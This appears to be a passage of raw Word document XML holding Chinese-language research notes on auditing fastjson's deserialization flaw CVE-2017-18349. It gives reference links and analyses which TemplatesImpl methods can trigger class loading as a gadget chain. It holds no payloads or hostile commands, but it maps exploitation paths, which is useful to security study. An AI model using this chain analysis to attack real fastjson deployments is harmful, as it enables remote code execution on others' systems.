        <w:t>待研究：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06961D5B" w14:textId="4C0A8859" w:rsidR="00BC5945" w:rsidRDefault="00917ADC" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00917ADC">
        <w:t>https://github.com/NickstaDB/BaRMIe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB6F3B7" w14:textId="77777777" w:rsidR="00BC5945" w:rsidRDefault="00BC5945" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ECECDFD" w14:textId="737794FC" w:rsidR="009B2BF0" w:rsidRDefault="009B2BF0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>fastjson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码审计</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AF04B1" w14:textId="06427AA6" w:rsidR="00346C07" w:rsidRDefault="00EA4344" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00EF2C4F">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://xz.aliyun.com/t/12096</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4344">
        <w:t>2023-02-01 15:43:17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1820E4B6" w14:textId="5D15EF64" w:rsidR="00346C07" w:rsidRPr="00EA4344" w:rsidRDefault="00D650A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D650A6">
        <w:t>https://paper.seebug.org/312/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4460B1" w14:textId="4F0ED09C" w:rsidR="00346C07" w:rsidRDefault="0027523C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0027523C">
        <w:t>https://www.yuque.com/m0re/demosec/xf1pd2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4477393F" w14:textId="6205D2A2" w:rsidR="009B2BF0" w:rsidRDefault="0009141C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0009141C">
        <w:t>https://www.cnblogs.com/nice0e3/p/14601670.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEEAB44" w14:textId="77777777" w:rsidR="009B2BF0" w:rsidRDefault="009B2BF0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62205B17" w14:textId="77777777" w:rsidR="00AB3E74" w:rsidRDefault="00AB3E74" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33A6E7BF" w14:textId="77777777" w:rsidR="00AB3E74" w:rsidRDefault="00AB3E74" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C4089F5" w14:textId="77777777" w:rsidR="00AB3E74" w:rsidRDefault="00AB3E74" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FA7706F" w14:textId="77777777" w:rsidR="00AB3E74" w:rsidRDefault="00AB3E74" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21E58B35" w14:textId="63D40BB9" w:rsidR="009948DF" w:rsidRPr="009948DF" w:rsidRDefault="009948DF" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009948DF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CVE-2017-18349</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>只有一条链可用，非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>条</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC1353F"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p>
    <w:p w14:paraId="5824941E"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>会调用类加载器的顶层方法是</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> TemplatesImpl.java#defineTransletClasses</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>，对</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>defineTransletClasses()</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>进行查找用法，可以看到三处调用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5321C3"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p>
    <w:p w14:paraId="2642E7AB"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>```java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBE5CF1"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>[] </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>getTransletClasses</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>() </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>没人调用它，不知道怎么触发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750070E0"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>getTransletIndex</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>() </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>不成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF72DCC"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Translet</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>getTransletInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>() </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>可用，已分析完</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A4BEA8"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4832FAD0"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p>
    <w:p w14:paraId="66CCD7D9"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>因此可以构造三个链（不写</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>getTransletInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B819B50"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p>
    <w:p w14:paraId="16303317"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b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>### getTransletClasses</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5224C9D4"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6796E6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> getTransletClasses() -&gt; defineTransletClasses()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685FA700"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>没有类似于</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>TransletClasses</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>的大小写不敏感的成员变量，且没地方调用</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>getTransletClasses</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>，此链不可用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389694CD"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p>
    <w:p w14:paraId="03D7423C"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>```java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7414AF64"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569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>[] </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>getTransletClasses</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589986FD"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DC74E6"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> (_class == </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>defineTransletClasses</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687D5EFD"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB1FC08"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
